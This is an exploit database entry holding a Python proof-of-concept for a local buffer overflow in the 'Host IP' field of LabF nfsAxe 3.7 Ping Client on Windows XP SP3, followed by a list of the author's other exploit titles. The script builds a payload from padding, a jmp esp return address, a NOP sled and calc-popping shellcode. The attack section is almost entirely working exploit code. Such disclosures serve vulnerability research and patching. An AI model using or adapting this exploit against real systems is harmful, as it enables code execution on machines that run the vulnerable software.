
"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)"

Author: "Dino Covotsos"

Platform: windows

Release date: 2019-04-22

#!/usr/bin/python
# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla)
# Date: 20-04-2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: http://www.labf.com/nfsaxe
# Version: 3.7
# Software Link : http://www.labf.com/download/nfsaxe.exe
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP SP3 ENG x86
# CVE: TBC from Mitre
# PoC:
# 1.) Generate nfsaxeping.txt, copy the contents to clipboard.
# 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok.
# 3.) Click Start and calc pops
#0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
#Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes)

shellcode = ("\x31\xC9"                     
        "\x51"                            
        "\x68\x63\x61\x6C\x63"            
        "\x54"                            
        "\xB8\xC7\x93\xC2\x77"            
        "\xFF\xD0")                 
		
buffer = "A" * 29 + "\x3b\x69\x5a\x77" + "\x90" * 10 + shellcode + "C" * (220-29-4-10-16)

payload = buffer
try:
    f=open("nfsaxeping.txt","w")
    print "[+] Creating %s bytes ping payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

Release Date | Title | Type | Platform | Author
2019-04-22 | "LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)" | local | windows | "Dino Covotsos"
2019-04-22 | "QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service" | dos | hardware | "Dino Covotsos"
2019-04-17 | "MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow" | remote | windows | "Dino Covotsos"
2019-04-15 | "MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow" | remote | windows | "Dino Covotsos"
2019-04-15 | "MailCarrier 2.51 - POP3 'USER' Buffer Overflow" | remote | windows | "Dino Covotsos"
2019-04-15 | "MailCarrier 2.51 - 'RCPT TO' Buffer Overflow" | remote | windows | "Dino Covotsos"
2019-04-15 | "MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow" | remote | windows | "Dino Covotsos"
2019-04-10 | "FTPShell Server 6.83 - 'Account name to ban' Local Buffer" | local | windows | "Dino Covotsos"
2019-04-10 | "FTPShell Server 6.83 - 'Virtual Path Mapping' Local Buffer" | local | windows | "Dino Covotsos"
2019-01-31 | "UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)" | local | windows | "Dino Covotsos"
2019-01-31 | "R 3.5.0 - Local Buffer Overflow (SEH)" | local | windows | "Dino Covotsos"
2019-01-31 | "Anyburn 4.3 - 'Convert image to file format' Denial of Service" | dos | windows | "Dino Covotsos"
2019-01-29 | "HTML5 Video Player 1.2.5 - Local Buffer Overflow (Non SEH)" | local | windows | "Dino Covotsos"
2019-01-28 | "R 3.4.4 XP SP3 - Buffer Overflow (Non SEH)" | local | windows | "Dino Covotsos"